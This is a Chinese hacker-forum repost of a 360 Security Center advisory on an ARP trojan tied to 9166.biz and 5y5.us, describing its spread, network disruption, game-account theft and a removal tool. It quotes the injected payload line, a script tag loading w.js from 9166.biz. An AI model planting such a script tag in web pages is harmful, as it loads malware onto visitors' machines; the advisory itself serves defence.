跳转到帖子
  • 游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

    赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

    TheHackerWorld官方

一台电脑中招,整网均被感染---9166.biz / 5y5.us Arp木马病毒专杀360独家发布


风尘剑心

推荐的帖子

原文:http://x.360safe.com/index.php/1/action_viewspace_itemid_27395.html

 

近日,360安全中心接到大量用户的举报,称全局域网的电脑中都出现了弹出5y5.us或9166.biz等网页,电脑被种植多个木马病毒,时常断网等现象。

专杀工具下载地址:

http://dl.360safe.com/kill_arp.exe

360安全中心的工程师随即对此进行了分析。
9166.biz  ---ARP木马病毒的恶意行为:

1.通过网页漏洞传播:该病毒通过植入网站上的一句JS脚本,导致有XML等漏洞的机器中招,成为此ARP病毒的传播源

2.ARP攻击篡改局域网数据包,一台电脑中招,局域网内的所有用户均遭殃:该病毒在整个局域网用户上网的网页中增加"<scrīpt src=http://9166.biz/w.js></scrīpt>"等内容,从而使局域网内有XML漏洞的电脑同时感染此病毒。

3.查杀困难,整个网络不时掉线:由于遭受攻击的局域网一般都是多台电脑感染,同时发起ARP攻击,因此整个局域网很不稳定,时常掉线甚至瘫痪。而且由于机器之间互相感染,因此彻底查杀及恢复非常困难。

4.后台下载多个热门游戏木马:该木马会自动到网上下载梦幻、征途、江湖、魔域、武林外传、奇迹世界、天龙八部、传奇世界、完美国际、风云、魔兽、江湖、QQ幻想等十多款网络游戏木马,偷窃用户游戏帐户。

据360安全中心专家分析,此ARP木马病毒已经导致了上百万台电脑感染,数万个局域网络频临瘫痪。360安全卫士已经在第一时间推出了专杀工具,供受害用户使用。同时,只要用户使用360安全卫士勤打系统补丁,就不会感染此木马病毒,防患于未然。

ARP病毒相关介绍连接:

http://zhidao.baidu.com/question/5917597.html

9166.biz是该类ARP病毒的一个变种,其他变种的ARP病毒我们的专杀应该也可以查杀


      360安全中心,紧急第一时间推出专杀程序,确保局域网用户上网安全!ARP病毒一杀到底!
             
      注:若在局域网中已发现此木马导致的症状(如全网断网、多台电脑弹出网页等),请用此专杀将局域网中的所有电脑均查杀一遍,方可彻底解决问题

 

论坛讨论地址:

http://bbs.360safe.com/viewthread.php?tid=213983&extra=page%3D1
 

链接帖子
意见的链接
分享到其他网站

黑客攻防讨论组

黑客攻防讨论组

    You don't have permission to chat.
    • 最近浏览   0位会员

      • 没有会员查看此页面。
    ×
    ×
    • 创建新的...